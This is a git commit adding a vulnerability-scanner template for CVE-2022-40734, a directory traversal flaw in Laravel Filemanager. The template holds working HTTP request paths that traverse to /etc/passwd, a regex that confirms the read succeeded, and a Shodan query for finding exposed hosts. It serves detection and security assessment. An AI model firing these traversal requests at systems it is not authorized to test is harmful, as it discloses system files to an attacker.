Merge pull request #5375 from arafatansari/patch-92

Create CVE-2022-40734.yaml
2022-09-15 17:44:48 +05:30 · 2022-09-15 17:44:48 +05:30 · b760ab1144
parent dc71847b7e 4f7d31b4ec
commit b760ab1144
1 changed files with 29 additions and 0 deletions
--- a/cves/2022/CVE-2022-40734.yaml
+++ b/cves/2022/CVE-2022-40734.yaml
@ -0,0 +1,29 @@
+id: CVE-2022-40734
+
+info:
+  name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal
+  author: arafatansari
+  severity: high
+  description: |
+    UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.
+  reference:
+    - https://github.com/UniSharp/laravel-filemanager/issues/1150
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-40734
+  classification:
+    cve-id: CVE-2022-40734
+  metadata:
+    verified: true
+    shodan-query: http.html:"Laravel Filemanager"
+  tags: cve,cve2022,laravel,unisharp,lfi,traversal
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
+      - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
+
+    stop-at-first-match: true
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"